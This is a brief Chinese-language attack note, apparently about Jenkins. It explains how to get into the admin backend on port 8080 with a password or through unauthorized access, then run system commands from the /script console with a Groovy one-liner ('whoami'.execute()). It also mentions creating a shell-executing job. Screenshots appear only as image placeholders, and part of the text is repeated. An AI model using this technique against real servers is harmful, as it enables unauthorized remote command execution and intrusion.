1. 通过密码或者未授权访问漏洞进入后台
http://xx.xx.xx.xx:8080/script
执行命令
println "whoami".execute().text

1.png
1. 第二种方式
创建一个执行shell的任务

2.png

3.png

4.png

5.png

6.png
http://xx.xx.xx.xx:8080/script
执行命令
println "whoami".execute().text
创建一个执行shell的任务